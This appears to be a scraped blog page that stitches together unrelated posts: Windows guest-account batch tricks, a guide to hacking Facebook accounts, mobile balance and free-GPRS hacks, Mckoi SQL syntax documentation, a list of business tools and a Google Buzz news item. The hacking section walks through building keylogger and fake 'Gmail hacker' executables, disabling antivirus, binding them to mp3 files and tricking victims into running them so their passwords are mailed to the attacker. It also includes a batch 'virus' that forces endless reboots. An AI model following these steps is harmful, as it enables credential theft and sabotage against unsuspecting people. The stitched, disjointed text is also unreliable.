Some special tricks from command prompt/cmd if logged in through guest account

(1)If you want to open regedit and cmd when run is disabled and you are logged in as guest, you can use notepad.

open notepad and type command.com and save it as cmd.bat this batch file will open command prompt.
if you cant open regedit by run open notepad type regedit and save it as regedit.bat double click on this and regedit window will open.(2)To abort shutdown ,use notepad
-Open notepad and type shutdown -a and save it as shutdown.bat.next time when your computer is about to shutdown double click on this bat file. for other cmd commands open command prompt and type shutdown a and press enter.

(3)cmd fun virus- open notepad and type shutdown -r 10 and save as restart.bat this will restart your computer in 10 seconds if you want to use this for fun paste this file in system 32 and see. computer will restart in every 10 second.

(4)IP command- open command prompt and type ipconfig/all.
(5)How to know your friend’s ip when chatting on a messenger. suppose you are using g-talk. ask your friend for a good wallpaper you have downloaded. send this to him .Now open your cmd and type Netstat -n

Advertisements

How to hack Facebook accounts for free

How to hack Facebook accounts for free
I brought this post not for misuse or illegal ways of Hacking but to teach my friend how your Facebook account can be hacked, software used in it and what they do to protect their Facebook account
Different Ways to Hack Facebook Account:-
Facebook account can be hack from one of following ways.
1.Facebook Phishing
2.By use of Key logger
3.Facebook Account hack with get control on Primary email address
1.Get access to Primary email address to hack someone’s Facebook account:-
i think hacking victims email address(Primary email address of Facebook) is easier than hacking of Facebook. Most of the users uses gmail or yahoo account email address as as primary email address. A genius hacker can easily gain over victims’ gmail account or yahoo email account.
How to hack Facebook accounts for free
After gaining control over primary email address of facebook, you simply use the  “Forgot password” facility that will ask Facebook to send password reset email to your primary email address- which is already hacked.
Thus, your Facebook account password will be reset and to hack Facebook account you already have another alternative as well.
Hacking Facebook Account Password using Free Emissary Keylogger:-
For this you have to fill two requirement1.hack G mail.This you either by the step provided above or by downloading:-Link to download- G mail hacker

 

Follow the Step to hack Gmail Account Password:-
Step 1: Download ‘Gmail hacker‘ Software (extract the file to desktop). If your Antivirus deletes the file, then please turnoff your Antivirus or uninstall it and try downloading again.
Step 2: Run ‘Gmail hacker Bulder.exe’ file and enter your gmail account details, so that the password of your victim can be mailed to you. If you are afraid of entering your gmail details, then do create one fake account and enter those details.
Step 3: After you enter your ‘Gmail account’ details Click on ‘Build’. Now the Gmail Hacker will Clone itself, ie it will create another file called ‘Gmail Hacker.exe’ and will save it in the same folder.
Step 4: Now Send the ‘Gmail Hacker.exe’ file that you just created to your Victim Via email or Upload it to any File sharing website for eg: box.net, Rapidshare, etc and send the link via chat or email.
Ask the Victim to try that software to hack others email and some how convince him to run that software and enter all information (which includes his Gmail id and password plus Gmail ID of the victim he want to hack).
When he enters the required information and hits the ‘hack them’ Button, he will receive an error message as shown below and The Username and Password will be mailed to your Gmail Id (that you Specified in Step 2)
Note: you Should Provide a valid USERNAME and PASSWORD, in order to receive the hacked details

 

 2.This Trick requires you to have ‘Microsoft’s .net Framework‘, if you don’t have please download and install it.Link to download:-Microsoft.net
Hacking Facebook Account Password using Free Emissary Keylogger;-
How to hack Facebook accounts for free
Step 1: Download ‘Emissary Keylogger‘ Software and extract the files to desktop. If your Antivirus deletes the file, then please turnoff your Antivirus or uninstall it and try downloading again.
Step 2: Run ‘Emissary.exe’ file and enter your gmail account details,  so that the password and other info of your victim can be mailed to you. If you are afraid of entering your gmail details, then do create one temporary fake account and enter those details.
How to hack Facebook accounts for free
Step 3: After you enter your ‘Gmail account’ details Click on ‘Test’ to test the connection to your Gmail account.  In the Server name Field you can change the name if you want. enter any Time Interval in the interval field. This timer controls the time interval between two keylogs emails. You can also show fake error message to your Victim when he clicks your server.exe file. to do so enter the error title and description in the ‘Fake error message’ field.
Step4: Now after filling the required fields, Click ‘Build’ button. This will create another file called server.exe in the same directory.
How to hack Facebook accounts for free
Step5: Now send this server.exe file to victim and make him install it on his computer. You can use Binder or Crypter to bind this server.exe file with say any .mp3 file so that whenever victim runs mp3 file, server is automatically installed on his computer without his knowledge. also read: How to change ICON of .exe file?
 Now because this is a free keylogger, you can’t send server.exe file via email. Almost all email domains have security policy which does not allow sending .exe files. So to do this you need to compress the file with WinRar or upload it to Free File Storage Domains, like Mediafire, rapidshare, filethief etc.
 How to hack Facebook accounts for free
Step6: Once the victim runs your sent keylogger file on his computer, it searches for all the stored usernames and passwords and it will send you email containing all keylogs and screenshots regularly after the specified ‘Time interval’.

Mobile gprs and Balance Hacking Tips and tricks

1.Mobile balance hacking:-
To download this software from your mobile open http://wap.mobiletoones.com website on your mobile and enter 13057 WAP code
FREE GPRS: Airtel Mobile Hack:-
link for free mobile balance hacking software:-  Click to Download


2.IDEA BALANCE TRANSFER TRICK:-
Idea Balance Transfering Trick
: Dial
*567*(Mobile No.)*(Transfer Balance)#
Then Press Call Button

3.How to activate Airtel free gprs:-


airtel free gprs hacking
1) Activate Airtel Live

2)Create TWO Airtel GPRS data accounts  and select the
FIRST as the active profile.

3) Connect your mobile to the PC  or Laptop and install the driver for
your mobile’s modem.

4) Create a new dial-up connection using the NEW CONNECTION
WIZARD as follows

Connecting Device :  Your mobile’s modem
ISP Name :  Airtel or anything you like
Phone Number : *99***2#
Username and Password : blank

5) Configure your browser and download manager to use the proxy
100.1.200.99 and port 8080.

6) Connect to the dial-up account. You will be connected at 115.2
kbps (but remember, that is a bad joke).

7) Pick up your mobile and try to access any site. You will get “Access
Denied…”(except for Airtel Live!).

8 ) On the PC or Laptop open your browser, enter any address ,
press ENTER and…….WAIT

9) After a few seconds the page will start to load and you will be able to acess free Gprs.

Advice:-My advice is to use Opera since you can browse both wap and regular websites

 

 

 

SQL in Brief

SQL 
It eases the burden of programmer and other user’s as they need to know how or where data is stored..They just have to specify what is required and how the specific data set to be presented. It is just like querying in simple English which allow the user to specify how the human conceptualizes the query in the mind.

SQL Syntax Introduction


2. CREATE TABLE syntax
CREATE TABLE [ IF NOT EXISTS ] table_name
( column_declare1, column_declare2, constraint_declare1, … )
column_declare ::= column_name type [ DEFAULT expression ]
[ NULL | NOT NULL ] [ INDEX_BLIST | INDEX_NONE ]
type ::= BIT | REAL | CHAR | TEXT | DATE | TIME |
FLOAT | BIGINT | DOUBLE | STRING | BINARY | NUMERIC |
DECIMAL | BOOLEAN | TINYINT | INTEGER | VARCHAR |
SMALLINT | VARBINARY | TIMESTAMP | LONGVARCHAR |
JAVA_OBJECT | LONGVARBINARY
constraint_declare :: = [ CONSTRAINT constraint_name ]
PRIMARY KEY ( col1, col2, … ) |
FOREIGN KEY ( col1, col2, … ) REFERENCES f_table [ ( col1, col2, … ) ]
[ ON UPDATE triggered_action ] [ ON DELETE triggered_action ] |
UNIQUE ( col1, col2, … ) |
CHECK ( expression )
[ INITIALLY DEFERRED | INITIALLY IMMEDIATE ]
[ NOT DEFERRABLE | DEFERRABLE ]
triggered_action :: =
NO ACTION | SET NULL | SET DEFAULT | CASCADE
When declaring string or binary column types the maximum size must be specified. The following example declares a string column that can grow to a maximum of 100 characters,
CREATE TABLE Table ( str_col VARCHAR(100) )
When handling strings the database will only allocate as much storage space as the string uses up. If a 10 character string is stored in str_col then only space for 10 characters will be allocated in the database. So if you need a column that can store a string of any size, use an arbitrarily large number when declaring the column. Mckoi SQL Database does not use a fixed size storage mechanism when storing variable length column data.
JAVA_OBJECT is a column type that can contain serializable Java objects. TheJAVA_OBJECT type has an optional Java class definition that is used for runtime class constraint checking. The following example demonstrates creating aJAVA_OBJECT column.
CREATE TABLE ObjectTable (
obj_id NUMERIC, obj JAVA_OBJECT(java.awt.Point))
If the Java class is not specified the column defaults to java.lang.Object which effectively means any type of serializable Java object can be kept in the column.
String types may have a COLLATE clause that changes the collation ordering of the string based on a language. For example, the folling statement creates a string that can store and order Japanese text;
CREATE TABLE InternationalTable (
japanese_text VARCHAR(4000) COLLATE ‘jaJP’)
The ‘jaJP’ is an ISO localization code for the Japanese language in Japan. Other locale codes can be found in the documentation to java.text.Collate.
Unique, primary/foreign key and check integrity constraints can be defined in theCREATE TABLE statement. The following is an example of defining a table with integrity constraints.
CREATE TABLE Customer (
number VARCHAR(40)  NOT NULL,
name   VARCHAR(100) NOT NULL,
ssn    VARCHAR(50)  NOT NULL,
age    INTEGER      NOT NULL,
CONSTRAINT cust_pk PRIMARY KEY (number),
UNIQUE ( ssn ),              // (An anonymous constraint)
CONSTRAINT age_check CHECK (age >= 0 AND age < 200)
)


3. ALTER TABLE syntax
ALTER TABLE table_name ADD [COLUMN] column_declare
ALTER TABLE table_name ADD constraint_declare
ALTER TABLE table_name DROP [COLUMN] column_name
ALTER TABLE table_name DROP CONSTRAINT constraint_name
ALTER TABLE table_name DROP PRIMARY KEY
ALTER TABLE table_name ALTER [COLUMN] column_name SET default_expr
ALTER TABLE table_name ALTER [COLUMN] column_name DROP DEFAULT
ALTER CREATE TABLE ….
ALTER is used to add / remove / modify the columns and integrity constraints of a table. The ADD [COLUMN] form adds a new column definition to the table (using the same column declaration syntax in the CREATE command). The DROP [COLUMN]form drops the column with the name from the table. ALTER [COLUMN] column_name SET default_expr alters the default value for the column. ALTER [COLUMN] column_name DROP DEFAULT removes the default value set for the column.
The following example adds a new column to a table;
ALTER TABLE Order ADD notes VARCHAR(60000) DEFAULT ‘n/a’
ADD constraint_declare is used to define a new integrity constraint on a table (using the same constraint declaration syntax in the CREATE command). DROP CONSTRAINT is used to drop a named constraint from a table.
The other form of this statement is ALTER CREATE TABLE …. This alters the table to the specification of the given CREATE statement. Any columns that are in the original table are not lost provided the column name is in the new table specification. Any columns that were not in the original table are set to the default value.
The following example demonstrates this form of ALTER statement;
ALTER CREATE TABLE table
( col1 INTEGER NOT NULL UNIQUE,
col2 NUMERIC,
col3 VARCHAR(90000) )
The ALTER CREATE TABLE … syntax is an extension to the SQL-92 standard.

4. DROP TABLE syntax

DROP TABLE [ IF EXISTS ] table_name1, table_name2, ….
Removes the table(s) from the database. The IF EXISTS clause will drop the table only if it exists. If this clause is not present an error is generated if the table does not exist. Any data that was in a dropped table is lost so use with care.

5. CREATE VIEW syntax

CREATE VIEW table_name [ ( column_name1, column_name2, … ) ]
AS SELECT …
Creates a new view. A view is a virtual table based on the result of a SELECTquery. The content of a view may reference any number of other tables and views.
A simple example of a view follows;
CREATE VIEW ViewOfTableA AS SELECT col1 FROM TableA
A view acts like a regular table and can be queried as you would a table made with the CREATE TABLE statement. Views are read-only.


6. DROP VIEW syntax
DROP VIEW table_name
Removes a view from the database. A view can be changed by dropping and recreating it.


7. CREATE SEQUENCE syntax
CREATE SEQUENCE name
[ INCRE
MENT increment_value ]
[ MINVALUE minimum_value ]
[ MAXVALUE maximum_value ]
[ START start_value ]
[ CACHE cache_value ]
[ CYCLE ]
Creates a new sequence generator that can be used to generate an iterative sequence of values. Sequence generators have a number of uses including the creation of primary keys for a table. The INCREMENT, MINVALUE, MAXVALUE, START, and CACHE values are all optional.
The INCREMENT value specifies how the sequence increments each iteration. By default a sequence generator increments by 1. The MINVALUE and MAXVALUE values specify the bounds of the sequence generator. By default MINVALUE and MAXVALUE are 0 and Long.MAX_VALUE respectively. The START value specifies the first key (exclusive) of the generator. The CACHE value specifies how many keys should be cached ahead of time.
Below is an example that creates a new sequence generator called ‘seq_key_1’ that starts at 10 and increments by 2 each iteration;
CREATE SEQUENCE seq_key_1 INCREMENT 2 START 10
A sequence generator is accessed by a call to the NEXTVAL function. TheNEXTVAL function iterates the generator and returns the next value from the sequence. The NEXTVAL function is an atomic operation and guarantees that no two identical values will be returned regardless of the frequency or concurrency of calls to the function. Below is a simple example;
SELECT NEXTVAL(‘seq_key_1’)

8. DROP SEQUENCE syntax

DROP SEQUENCE name
Drops a sequence generator previously created with the CREATE SEQUENCEstatement. A sequence generator may be changed by dropping the sequence and then recreating it.


9. COMPACT TABLE syntax
COMPACT TABLE table_name
Compacts the table data file in the file system. This removes all unused space from the table file and may rearrange the structure of the table to a form that better fits the characteristics of the data being stored.

10. CREATE SCHEMA syntax

CREATE SCHEMA schema_name
Creates a schema with the given name. By default a database has three schema initially defined, SYS_INFOSYS_JDBC and APP. The SYS_INFO and SYS_JDBCschema contain a number of important system tables and the APP schema is the default user schema.
The following is an example of creating a new schema and changing to it;
CREATE SCHEMA my_schema;
SET SCHEMA my_schema;

11. DROP SCHEMA syntax

DROP SCHEMA schema_name
Drops the schema with the given name. A schema may only be dropped if it contains no tables. The SYS_INFO and APP schema may not be dropped.


12. INSERT syntax
INSERT INTO table_name [ ( col_name1, col_name2, …. ) ]
VALUES ( expression1_1, expression1_2, …. ),
( expression2_1, expression2_2, …. ), ….
INSERT INTO table_name [ ( col_name1, col_name2, …. ) ]
SELECT …
INSERT INTO table_name
SET col_name1 = expression1, col_name2 = expression2, ….
This is the SQL command to insert records into a table in the database. This statement comes in three forms. The first inserts data from a VALUES clause;
INSERT INTO table ( col1, col2, col3 )
VALUES ( 10, 4 + 3, CONCAT(‘1’, ‘1’, ‘c’) ),
( 11, (28 / 2) – 7, CONCAT(col1, ‘c’) )
The second form is used to copy information from a SELECT query into the table specified in the INSERT statement. For example;
INSERT INTO table ( col1, col2, col3 )
SELECT id, num, description
FROM table2
WHERE description LIKE ‘11%’
The third form uses a list of column SET assignments. For example;
INSERT INTO table
SET col1 = 10, col2 = 4 + 3, col3 = CONCAT(col1, ‘c’)
If a column of the table is not specified in an INSERT the default value declared for the column is used. If no default value was declared a NULL value is inserted in the column. If the column is declared as NOT NULL the insert operation fails.


13. DELETE syntax
DELETE FROM table_name
[ WHERE expression ]
[ LIMIT limit_amount ]
Deletes all the rows from the table that match the WHERE clause. An optionalLIMIT clause specifies the maximum number of matched rows to be removed. An example of using the DELETE statement;
DELETE FROM table
WHERE col3 LIKE ‘11%’ AND col1 < 1000 LIMIT 200

14. UPDATE syntax

UPDATE table_name
SET col_name1 = expression1, col_name2 = expression2, ….
[ WHERE expression ]
[ LIMIT limit_amount ]
Updates information in a table. The SET clause is a list of assignments that describe how the columns of the data matched by the WHERE clause are to be updated. Any columns not assigned in the SET clause are left unchanged. Examples of using UPDATE;
UPDATE Employee
SET salary = salary * 1.25
WHERE name = ‘Bob’
UPDATE Order
SET id = id + 3, part = CONCAT(part, ‘-00’)
WHERE part LIKE ‘PO-%’
LIMIT 10


15. SELECT syntax
SELECT [ DISTINCT | ALL ]
column_expression1, column_expression2, ….
[ FROM from_clause ]
[ WHERE where_expression ]
[ GROUP BY expression1, expression2, …. ]
[ HAVING having_expression ]
[ ORDER BY order_column_expr1, order_column_expr2, …. ]
column_expression ::= expression [ AS ] [ column_alias ]
from_clause ::= select_table1, select_table2, …
from_clause ::= select_table1 LEFT [OUTER] JOIN select_table2 ON expr  …
from_clause ::= select_table1 RIGHT [OUTER] JOIN select_table2 ON expr  …
from_clause ::= select_table1 [INNER] JOIN select_table2  …
select_table ::= table_name [ AS ] [ table_alias ]
select_table ::= ( sub_select_statement ) [ AS ] [ table_alias ]
order_column_expr ::= expression [ ASC | DESC ]
The SELECT statement is used to form queries for extracting information out of the database. The following example query will return the number, quantity and price of all orders for more than 5 items sorted in descending order by order number. In addition it rounds the order price to two decimal places and applies a dollar ($) sign to the output.
SELECT number, quantity, CONCAT(‘$’, ROUND(price, 2))
FROM Order
WHERE quantity > 5
ORDER BY number DESC
The ORDER BY and GROUP BY clause may refer to a column, a column alias, or an expression. The HAVING clause is evaluated after the grouping and aggregate columns have been resolved.
For examples of using SELECT with aggregate functions see the ‘Internal SQL Functions’ section.

16. COMMIT and ROLLBACK syntax

COMMIT
ROLLBACK
Transactional operations for closing a transaction and either committing all the changes made or rolling back and disposing all changes. COMMIT may cause a concurrent transaction conflict exception to be thrown. If a conflict is detected the transaction is automatically rolled back. See the ‘Transactions’ section of the documentation for further details of how Mckoi handles transactions.


17. CREATE USER, ALTER USER and DROP USER syntax
CREATE USER username SET PASSWORD ‘password’
[ SET GROUPS groups_list ]
[ SET ACCOUNT ( LOCK | UNLOCK ) ]
ALTER USER username SET PASSWORD ‘password’
[ SET GROUPS groups_list ]
[ SET ACCOUNT ( LOCK | UNLOCK ) ]
DROP USER username
These are user management commands for creating/altering and dropping users in the system. Only members of the ‘secure access’ group are permitted to perform these operations, which includes the administrator user that is setup when the Mckoi database is created.
The following example creates a user called ‘harry’ with the password ‘cat’;
CREATE USER harry SET PASSWORD ‘cat’
See the ‘JDBC Driver’ section for documentation on connecting to a database using a username and password to connect to a database.


18. GRANT/REVOKE syntax
GRANT privileges ON database_object TO ( PUBLIC | user_list )
[ WITH GRANT OPTION ]
REVOKE [ GRANT OPTION FOR ] privileges ON database_object
FROM ( PUBLIC | user_list )
privileges ::= priv_item1, priv_item2, …
priv_item ::= ALL [ PRIVILEGES ] | SELECT | INSERT | UPDATE |
DELETE | REFERENCES | USAGE
database_object ::= [ TABLE ] table_name | SCHEMA schema_name
user_list ::= PUBLIC | username1, username2, …
Grants or revokes types of access on a table or view to a user. When a table or view is created the system gives full grant options to the user that created the object. The user is given the option to grant other users selective access to the object through the GRANT and REVOKE syntax. For example, the follow statement shows how a user would grant user ‘toby’ permission to SELECT from a table called MyTable;
GRANT SELECT ON TABLE MyTable TO toby
The GRANT command allows granting all users access to an object. The following statement makes MyTable globally readable;
GRANT SELECT ON TABLE MyTable TO PUBLIC
If you wish to give a user the option of granting a privilege to another user, addWITH GRANT OPTION to the GRANT statement.


19. SET syntax
SET variable = expression
SET AUTO COMMIT ( ON | OFF )
SET TRANSACTION ISOLATION LEVEL ( SERIALIZABLE )
SET SCHEMA schema_name
Makes a change to the state of the connection. SET AUTO COMMIT is used to switch transaction ‘auto commit mode’ on or off. When auto commit mode is on the engine commits after every statement. By default, a connection starts with auto commit mode switched on. SET TRANSACTION ISOLATION LEVEL currently only supports the SERIALIZABLE isolation level. See the ‘Transactions’ section of the documentation for details of how Mckoi handles transactions.
SET SCHEMA is used to change the default schema of a connection.

20. DESCRIBE syntax

DESCRIBE table_name
This command provides information about the columns of the table. It shows the column names, the type / size and scale (if applicable) and other useful information.

21. SHOW syntax

SHOW engine_variable
engine_variable ::= TABLES | SCHEMA | STATUS | CONNECTIONS
Shows internal information about the database system. SHOW TABLES returns a list of tables in the database. SHOW STATUS returns debugging and statistical information about the internal state of the database engine. SHOW CONNECTIONSreturns a snapshot of the current connections on the database. SHOW SCHEMAlists all the schema defined.

22. SHUTDOWN syntax

SHUTDOWN
Shuts down the database. If the database is running as a server the database shuts down cleanly and the process is stopped. If the database is embedded in a Java application it is cleanly put into a shut down state.
Only a user with the correct grants may successfully execute this command.

101 Useful Resources for Online Entrepreneurs

Resources For Entrepreneurs

Every day more and more entrepreneurs are building successful businesses using the internet. There is an abundance of opportunity online and depending on the venture, there is often less cost and risk involved when compared with traditional businesses. There is also a wealth of resources available to help the online entrepreneur to run a business more effectively and more profitably, and we list many of those resources here. Feel free to leave a comment with your feedback and your recommendations of other resources.

Communications / VoIP

The internet brings great opportunities to do business all with people from all around the world, and fortunately there are also a number of resources to help with the communication that is necessary. The resources here will allow you to communicate inexpensively with others:
        1.

Skype

       – Free calls over the internet to other people on Skype for as long as you like.
        2.

Vonage

       – Leading provider of VoIP internet broadband telephone services.
        3.

Gizmo

         – Low cost international calling and free calls to users on Yahoo Messenger,

Google Talk

      , Windows Live users and SIP networks.
        4.

Vonics Digital

       – Plans start at $12.99 per month.
        5.

VoipBuster

       – Free program that uses the latest technology to bring free and high-quality voice communications to people all over the world.
        6.

SunISP

       – VoIP Plans

Data Backup

Anyone that has important of sensitive information on their computer needs to have a system in place for backing up the data. For online entrepreneurs a loss of data could be tragic. These resources will give you a number of options from which you can choose the one that is best for you. Backing up your hard drive can be done quickly, easily, and automatically:

        1.

Mozy

       – Industry-leading solution for online backup.
        2.

Intronis

         –

Online backup

      solution with remote computer data backup software.
        3.

Carbonite

       – Unlimited online backup for one flat fee.
        4.

Data Deposit Box

       – Your source for online backup, and secure online data backup.
        5.

Athena Backup

       – Automatically backup your home computer files with Athena Backup.
        6.

Data Protection Services

       – Secure online backup services, free trial!

Invoicing

If you are sending and tracking invoices to customers, you may be able to save some time and make the process more efficient by using a program that is specifically designed for this purpose. These resources can help the organization of your invoicing and they can allow you to have more time to spend on what you do best:

        1.

Bamboo Invoice

         – Simple,

Open Source

      , Online Invoicing.
        2.

FreshBooks

       – Online invoicing and time tracking service.
        3.

Transcepta

         –

Electronic invoicing

      solution.
        4.

Blinksale

       – The easiest way to send invoices online.
        5.

InterlinQ Solutions

       – Providing a daily job report, time sheets, job tracking, construction reports and mobile billing.
        6.

Bill My Clients

       – Easy way to create and send invoices and bills to your clients.
        7.

Billing Orchard

       – Online electronic billing software application.
        8.

2nd Site

       – Secure invoicing service w/ online invoice payment & online employee timesheets.

Financial Management and Accounting

Many online entrepreneurs and small businesses do not have the need to use an accounting system that is as complex as that of a larger business, but every business needs to have organized and accurate financial records. These resources will provide you with everything you need and can easily be used by anyone:

        1.

Intacct

         – Delivers

ERP software

      as a service to small and midsize companies.
        2.

QuickBooks Online

       – Accounting Solutions for professionals and businesses.
        3.

Xero

       – Slash the hours you spend every week on accounting administration.

Time Management and Project Management

Time management is critical to achieving maximum productivity. In order to improve that time management of your business, try some of these resources. I think you will see that the resulting organization and efficiency will have a noticeable impact on the results of your work:

        1.

Google Calendar

       – Free online shareable calendar service.
        2.

Vitalist

       – Web based task manager designed to work with Getting Things Done (GTD).
        3.

Backpack

       – Personal and small business information management, intranet, and to do list organizer.
        4.

Basecamp

       – Web-based tool that lets you manage and track projects.
        5.

Goplan

       – Online project management app.
        6.

Copper Project

       – Project Management Software.
        7.

Side Job Track

       – Web-based job tracking, invoicing, reporting & project management software.
        8.

ActiTime

       – Free Time Tracking Software.

Contact Manager

Online entrepreneurs typically have a very large number of contacts that they need to keep track of. These programs are specifically created to help you effectively manage your contacts. If you could use some improvement in this area, try some of these resources:

        1.

Big Contacts

       – Web Based Contact Manager for 2 to 2000 People.
        2.

Highrise

       – Shared contact manager.
        3.

BatchBook

       – Easy-to-use contact management system.
        4.

Relenta CRM

       – Small business CRM software.
        5.

Oprius

       – Sales and Contact Management Software for Independent Sales Consultants.
        6.

PipelineDeals

       – CRM made simple – $15/User/Month.
        7.

Zoho

       – Customer Relationship Management, on demand CRM.
        8.

Simple Sales Tracking

       – Web-based hosted CRM.
        9.

SugarCRM

       – Commercial Open Source CRM.

Hiring Freelancers

At some point you may have a need to hire freelancers of some type. Fortunately, there are plenty of resources online to help you find freelancers and identify the right one for your project. All of the websites listed here will allow you to search for freelancers according to your needs:

        1.

Elance

       – Outsourcing to Freelancers.
        2.

Guru

       – Free service helps you find freelancers, get free quotes, and get your project done.
        3.

SmarterWork

       – Top small business services marketplace.
        4.

Contracted Work

       – Work Jobs Freelance Search.
        5.

oDesk

       – Global service marketplace for small and medium sized businesses.
        6.

Get A Freelancer

       – Freelance programmers and web designers.
        7.

BizReef

       – Online Services platform.

Online Reputation Management Tools

Reputation management is a very hot topic online right now. As an entrepreneur, your reputation can have a serious impact on your success and you have a need to monitor your reputation and to make sure that what is being published is true. There are a variety of resources that can help in different ways:

        1.

claimID

       – Free, easy way to manage your online identity.
        2.

Google Alerts

       – Email updates of the latest relevant Google results.
        3.

Yahoo Alerts

       – Free, personalized notification service.
        4.

Technorati

       – Real-time search for user-generated media.
        5.

FindMeOn

       – Manage your circles of friends, family, colleagues and others.
        6.

myOpenID

       – Secure OpenID provider.

Accepting Payment

If you are taking online payments from customers or clients, you will need a way to make that happen. There are a number of different options, and the details of each can vary a good bit. Take a look at these options and see which is best for your situation:

        1.

PayPal

       – World renowned.
        2.

Google Checkout

       – Google’s way to send and receive money.
        3.

Neteller

       – Online payment solutions.
        4.

Moneybookers

       – Cheaper way to send and receive money worldwide.
        5.

iKobo

       – Pick up your money at over 1000000 Visa ATMs.
        6.

CheckFree

       – Provides financial electronic commerce services.

Shopping Carts

E-Commerce sites that are selling products to customers will need some type of shopping cart. There are a number of open source options listed below, as well as a number of other options. Hopefully you will find one that is well-suited to your needs:

        1.

Zen Cart

       – Free, user-friendly, open source shopping cart system.
        2.

osCommerce

       – Free online shop program.
        3.

AgoraCart

       – Free shopping cart.
        4.

OpenCart

       – Open source PHP-based online shopping cart system.
        5.

Ubercart

       – Open source e-commerce suite.
        6.

X-Cart

       – Shopping cart software & PHP ecommerce solutions.
        7.

NetSuite

       – Integrated web-based business software suite.
        8.

ZNode

       – ASP.NET shopping cart.
        9.

Fortune3

       – Ecommerce Shopping cart software.
        10.

Network Solutions

       – Robust, customizable Ecommerce online shopping cart software.
        11.

Kick Start Cart

       – Business professionally over the Internet.
        12.

Secure Delivery

       – The best digital download management site on the net!
        13.

Magento

       – Open Source eCommerce Evolved!

Social Networking

Social networking sites can help entrepreneurs to find potential partners, get advice from other entrepreneurs, network with others around the world, and to simply get some exposure for their profile. Each networking site is a little bit different. You’ll never have the time to use all of them effectively, so find a few that have potential to help you the most and be actively involved:

        1.

Cofoundr

       – Cofoundr is a private community for entrepreneurs.
        2.

Fast Pitch Networking

       – Business Networking Social Network for Business Professionals.
        3.

Killer Startups

       – Reviewing new startups.
        4.

Konnects

       – Business technology focus groups and networking events.
        5.

LinkedIn

       – Strengthens and extends your existing network of trusted contacts.
        6.

Ryze

       – Business Networking.
        7.

YoungEntrepreneur – 

      Largest social networking community for Entrepreneurs

8. Ziggs – White pages and free people search for professionals.

Finding Funding

Many entrepreneurs will need some type of funding for their ventures. If this is the case for you, these resources may be helpful. Locating potential funding sources can be a bit easier be taking advantage of the resources that are available:

        1.

GoBigNetwork

       – Angel investor network/venture capital.
        2.

Fundability

       – Puts your company in front of qualified and interested investors.
        3.

Find That Money

       – Formidable presence in consumer finance.
        4.

Venture Deal

       – Venture capital database.
        5.

American Capital Advance

       – Fast Business Loans.
        6.

Financing: Where to Find It

CPC Revenue

One of the most common ways to make money with a website is through cost per click programs like Google AdSense. While these programs are not a good fit for some sites and for some audiences, they have proven to effective for many:

        1.

Google AdSense

       – Google’s CPC Network.
        2.

Yahoo! Publisher Network

       – Yahoo’s CPC Network.
        3.

ABC Search

       – Get paid per click by ABC.
        4.

AdBrite

       – Webmasters can buy and sell text ads based on their site’s topic area.
        5.

Chitika

       – The leading merchandising network for bloggers.
        6.

Bidvertiser

       – Pay per click advertising.
        7.

Kanoodle

       – Distributes results to a large network of other search engines and search box providers.
        8.

Clicksor

       – Effective online advertising technology.
        9.

Kontera

       – Advertiser and Publisher Solutions.

CPM Revenue

CPC isn’t the only option for monetizing a website through advertisements. By choosing a CPM program you will be compensated for impressions rather than clicks. Here are some of the choices that are available:

        1.

ADSDAQ

       – A new advertising exchange.
        2.

ValueClick Media

       – One of the largest and most effective online advertising networks.
        3.

AdDynamix

       – Full-spectrum interactive provider delivering ad management.
        4.

Morning Falls

       – Online advertising solutions to advertisers and publishers worldwide.
        5.

CPX Interactive

       – Online ad network.
        6.

BurstMedia

       – Internet advertising network.
        7.

Casale Media

       – World’s fastest growing provider of online media solutions.
        8.

Tribal Fusion

       – Focused on high quality sites with targeted content and significant reach.
        9.

BrightRoll

       – Video advertising.
        10.

Adtegrity

       – Internet Advertising Solutions.

RIP Google Buzz

Google is shutting down the last remnants of Google Buzz to focus on Google+, the company announced on Friday.

“In a few weeks we’ll shut down Google Buzz and the Buzz API, and focus instead on Google+,” Bradley Horowitz, Google’s vice president of product, wrote on The Official Google Blog. “While people obviously won’t be able to create new posts after that, they will be able to view their existing content on their Google Profile, and download it using Google Takeout.”

In addition, Google is shuttering Code Search on Jan. 15 and other social media offerings, including the Twitter-like Jaiku — which will also be discontinued on that date — and iGoogle’s social features. As previously announced, Google Labs will also shut down.

Launched in February 2010, Google Buzz was initially seen as a threat to Twitter and Facebook, but never lived up to its promise, becoming one of the biggest flops of the year. It is likely that Buzz will be viewed as a forerunner to Google+, which had a stronger start, hitting 40 million users in its first three months, according to Google CEO Larry Page.